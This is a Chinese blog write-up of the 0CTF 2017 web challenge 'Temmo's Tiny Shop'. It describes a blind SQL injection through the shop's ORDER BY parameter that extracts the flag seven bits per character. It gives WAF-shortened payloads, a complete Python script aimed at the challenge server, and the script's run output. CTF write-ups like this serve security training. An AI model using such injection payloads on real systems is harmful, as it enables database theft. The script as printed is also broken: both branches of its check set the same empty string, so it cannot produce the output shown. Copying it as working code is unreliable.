些不

些不

关注
发信
关注(28)粉丝(399)

0CTF 2017 部分Web的某些不一样的思路

洒家参加了0CTF 2017,做了一些题目。赛后过了好几天,看网上已经有了一些写得不错的Writeup,这里就写一写洒家的一些不一样的思路。

一些不错的Writeup

Temmo’s Tiny Shop

洒家看网上的Writeup 在拿到Hint,知道flag的表名后爆破flag的每一字节,效率可能比较低。这里是洒家比赛的时候想到的按bit爆破的方法,对于ASCII,只考虑7bit,每字节固定需要7次请求即可得到。

需要购买Erwin Schrodinger's Cat和Brownie。

一开始的Payload是:

case(ascii(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),1,1))div(16)mod(2))when(1)then(name)else(price)end

由于长度限制(WAF,最长100字节),修改Payload:

if(ascii(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),1,1))div(16)mod(2),name,price)

由于长度还是太长,把Price改成3也可以排序。

if(ascii(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),1,1))div(16)mod(2),name,3)

注:此处的3并不是按第3列排序,即和order by 3 作用不同,而是和 order by '3' 作用相同,和不加order by 效果相同(不知道是MySQL什么特性)

由此,最终的脚本是:

import requests


# code from https://www.cnblogs.com/go2bed/p/6607565.html

s = requests.Session()

cookie = {'PHPSESSID':'YOURCOOKIE'} # add your cookie

url = 'http://202.120.7.197/app.php'

true_str = '"goods":[{"id":"5"'

false_str = '"goods":[{"id":"2"'

order_by_template = 'if(ascii(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),%d,1))div(%d)mod(2),name,3)'

flag = ''

for place_index in xrange(1, 1000):

    place_bin = ''

    for times in xrange(6,-1,-1):

        num = 2 ** times

        order_by = order_by_template % (place_index, num)

        params = {'action':'search','keyword':'','order':order_by}

        r = s.get(url, params=params, cookies=cookie)

        #print r.content

        if true_str in r.content:

            new_place_bin = ''

        else:

            new_place_bin = ''

        print new_place_bin,

        place_bin += new_place_bin

    place = chr(int(place_bin, 2))

    flag += place

    print flag

    if '}' in flag:

        break

print '\n***** get flag *****'

print flag

运行效果:

1 1 0 0 1 1 0 f

1 1 0 1 1 0 0 fl

1 1 0 0 0 0 1 fla

1 1 0 0 1 1 1 flag

1 1 1 1 0 1 1 flag{

1 1 1 0 0 1 0 flag{r

0 1 1 0 1 0 0 flag{r4

1 1 0 0 0 1 1 flag{r4c

1 1 0 0 1 0 1 flag{r4ce

1 0 1 1 1 1 1 flag{r4ce_

1 1 0 0 0 1 1 flag{r4ce_c

0 1 1 0 0 0 0 flag{r4ce_c0

1 1 0 1 1 1 0 flag{r4ce_c0n

1 1 0 0 1 0 0 flag{r4ce_c0nd

1 1 0 1 0 0 1 flag{r4ce_c0ndi

1 1 1 0 1 0 0 flag{r4ce_c0ndit

1 1 0 1 0 0 1 flag{r4ce_c0nditi

0 1 1 0 0 0 0 flag{r4ce_c0nditi0

1 1 0 1 1 1 0 flag{r4ce_c0nditi0n

1 0 1 1 1 1 1 flag{r4ce_c0nditi0n_

1 1 0 1 0 0 1 flag{r4ce_c0nditi0n_i

0 1 1 0 1 0 1 flag{r4ce_c0nditi0n_i5

1 0 1 1 1 1 1 flag{r4ce_c0nditi0n_i5_

1 1 0 0 1 0 1 flag{r4ce_c0nditi0n_i5_e

1 1 1 1 0 0 0 flag{r4ce_c0nditi0n_i5_ex

1 1 0 0 0 1 1 flag{r4ce_c0nditi0n_i5_exc

1 1 0 1 0 0 1 flag{r4ce_c0nditi0n_i5_exci

1 1 1 0 1 0 0 flag{r4ce_c0nditi0n_i5_excit

1 1 0 0 1 0 1 flag{r4ce_c0nditi0n_i5_excite

1 1 0 0 1 0 0 flag{r4ce_c0nditi0n_i5_excited

1 1 1 1 1 0 1 flag{r4ce_c0nditi0n_i5_excited}

***** get flag *****

flag{r4ce_c0nditi0n_i5_excited}
05-20 06:05
Powered by LMLPHP ©2024 些不 0.060025